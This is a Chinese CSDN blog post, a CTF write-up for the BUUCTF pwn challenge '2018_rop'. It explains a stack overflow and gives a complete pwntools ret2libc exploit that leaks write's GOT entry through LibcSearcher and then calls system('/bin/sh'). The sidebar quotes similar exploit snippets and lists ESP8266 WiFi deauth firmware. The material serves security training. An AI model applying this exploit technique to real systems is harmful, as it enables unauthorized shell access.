BUUCTF-Pwn-铁人三项(第五赛区)_2018_rop

已于 2022-03-25 21:22:46 修改
阅读量111 收藏
点赞数
分类专栏: CTF Pwn 文章标签: 其他
于 2022-03-25 21:08:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46035101/article/details/123399268
版权
CTF 同时被 2 个专栏收录
29 篇文章 0 订阅
订阅专栏
Pwn
21 篇文章 0 订阅
订阅专栏

题目截图
在这里插入图片描述

例行检查
在这里插入图片描述
用IDA打开,在主函数中发现溢出点
在这里插入图片描述
没有找到后门函数,但是找到了write函数用来泄露libc版本
在这里插入图片描述
常规流程,先泄露libc版本,计算system函数和字符串bin/sh的地址再利用
exp

from pwn import*
from LibcSearcher import *
elf=ELF('/home/lhb/桌面/2018_rop')
p=remote('node4.buuoj.cn',26218) 
main=0x80484C6
write_plt=elf.plt['write']
write_got=elf.got['write']

payload=b'a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4)
p.sendline(payload)
addr=u32(p.recv())
libc=LibcSearcher('write',addr) 
libcbase = addr- libc.dump("write")
system_addr = libcbase + libc.dump("system")
bin_sh_addr = libcbase + libc.dump("str_bin_sh")
payload=b'a'*(0x88+4)+p32(system_addr)+p32(main)+p32(bin_sh_addr)
p.sendline(payload)
p.interactive()
餐桌上的猫
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Buuctf2018_rop
qq_53809201的博客
01-01 177
经过在ida中搜索,发现既没有system函数也没有bin/sh字符串,所以要想办法泄露出libc函数的地址来得到libc版本,找到system函数和bin/sh地址偏移.发现main函数中调用了两个函数。在第二个调用函数中发现了溢出点.
[BUUCTF-pwn]——picoctf_2018_rop chain
Y_peak的博客
02-23 187
[BUUCTF-pwn]——picoctf_2018_rop chain 题目地址: https://buuoj.cn/challenges#picoctf_2018_rop%20chain checksec看看,开启了NX,但是没有canary IDA中查看一下 发现gets函数,可以栈溢出 发现flag,不过需要满足条件,才可以获得 接着找可能用到的函数 接着找到对应函数的地址 思路 利用栈溢出,构造rop链,首先将win1 = 1, 然后 win2 = 1,最后获得flag explo
BUUCTF(pwn)铁人三项(第五赛区)_2018_rop
半岛铁盒的博客
03-30 347
最基本的 rop; from pwn import* from LibcSearcher import* r=remote('node3.buuoj.cn',25292) elf=ELF('./2') write_got=elf.got['write'] write_plt=elf.plt['write'] main=0x80484c6 payload='a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4) r.sendl
[PWN] BUUCTF 铁人三项(第五赛区)_2018_rop 1(ret2libc3)
空城惜梦的博客
06-04 968
@[TOC]( [PWN] BUUCTF 铁人三项(第五赛区)_2018_rop)
BUUCTFPWN铁人三项(第五赛区)_2018_rop
m0_55368674的博客
01-15 320
BUUCTFPWN铁人三项(第五赛区)_2018_rop题解
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
buuctf|pwn-铁人三项(第五赛区)_2018_rop-wp
l2645470582_的博客
11-09 684
1.检查保护机制 2.我们用32位的IDA打开该文件 shift+f12查看关键字符串,没有发现关键字符串 3.我们查看main函数里面的内容 我们发现有两个函数 进入第一个函数 进入第二个函数 在第二个函数里面发现buf溢出,buf有0x88个字节,但是read()函数读取了0x100个字节 4.system("/bin/sh") 我们在文件中没有找到可以拿到shellcode权限 所以我们要用libc,计算偏移量,拿到shellcode权限...
[BUUCTF]PWN——picoctf_2018_rop chain
mcmuyanga的博客
11-04 970
picoctf_2018_rop chain 附件 步骤: 例行检查,32位,开启了NX保护 试运行一下程序,看到输入太长数据会崩溃 32位ida载入,习惯性的检索程序里的字符串,看见了flag.txt,双击跟进 看到程序将flag读入到了参数s里面,满足条件win1&&win2 &&a1==-59039827的条件,就能读出flag 从main函数开始看程序 vuln()函数 gets函数输入,没有限制读入长度,存在溢出漏洞,覆盖ret为flag函数地址,之后想
铁人三项(第五赛区)2018 rop
pondzhang的专栏
05-09 494
from pwn import * p = process('./2018_rop') gotwrite = 0x0804A010 pltwrite = 0x080483A0 start = 0x080483C0 bss = 0x0804A020 pltread = 0x08048360 def leak(address): payload = 'a' * 140 + p32(pltwrite) + p32(start) + p32(0x01) + p32(address) + p32(0x04
铁人三项(第五赛区)_2018_rop
、moddemod
06-20 616
exp #!/usr/bin/env python3 # coding=utf-8 from pwn import * from LibcSearcher import * context(log_level='debug') proc_name = './2018_rop' p = process(proc_name) p = remote('node3.buuoj.cn', 25414) elf = ELF(proc_name) write_plt = elf.plt['write'] read_.
write函数的详解与read函数的详解
热门推荐
dangzhangjing97的博客
03-20 7万+
write() 头文件:#include<unistd.h> 原型: ssize_t write(int fd,const void*buf,size_t count); 参数说明: fd:是文件描述符(write所对应的是写,即就是1) buf:通常是一个字符串,需要写入的字符串 count:是每次写入的字节数 返回值: 成功:返回写入的字节数...
picoctf_2018_rop chain
、moddemod
07-06 646
exp from pwn import * context.log_level = 'debug' proc_name = './PicoCTF_2018_rop_chain' p = remote('node3.buuoj.cn', 27027) elf = ELF(proc_name) flag_addr = elf.sym['flag'] win_function1 = elf.sym['win_function1'] win_function2 = elf.sym['win_function2'
buuctf ctf (第5.5波)学会使用LibcSearcher
月阴荒的博客
04-22 1418
jarvisoj_level3 https://blog.csdn.net/qinying001/article/details/104473597 jarvisoj_level3_x64 https://blog.csdn.net/qinying001/article/details/104473597 [HarekazeCTF2019]baby_rop2 同样需要注意这道题的flag不在当前目...
bjdctf_2020_babyrop
、moddemod
06-23 400
exp from pwn import * from LibcSearcher import * context(log_level='debug') proc_name = './bjdctf_2020_babyrop' p = process(proc_name) # p = remote('node3.buuoj.cn', 28227) elf = ELF(proc_name) read_got = elf.got['read'] puts_plt = elf.plt['puts'] main_.
buuctf [HarekazeCTF2019]baby_rop
carol2358的博客
04-17 389
可以在程序里找到binsh,ctrl+L, 程序本身有system函数 找到rop 修改system参数为/bin/sh,然后跳转到system运行就可以了,最后加一个假的返回地址 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level...
buuctf pwn 第五空间决赛pwn5
最新发布
09-28
buuctf pwn 第五空间决赛pwn5是一个CTF pwn题,它涉及到格式化字符串漏洞。格式化字符串漏洞是一种常见的安全漏洞,利用这个漏洞可以读取或修改程序的内存中的数据,从而导致程序行为异常或者攻击者获取敏感信息。在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值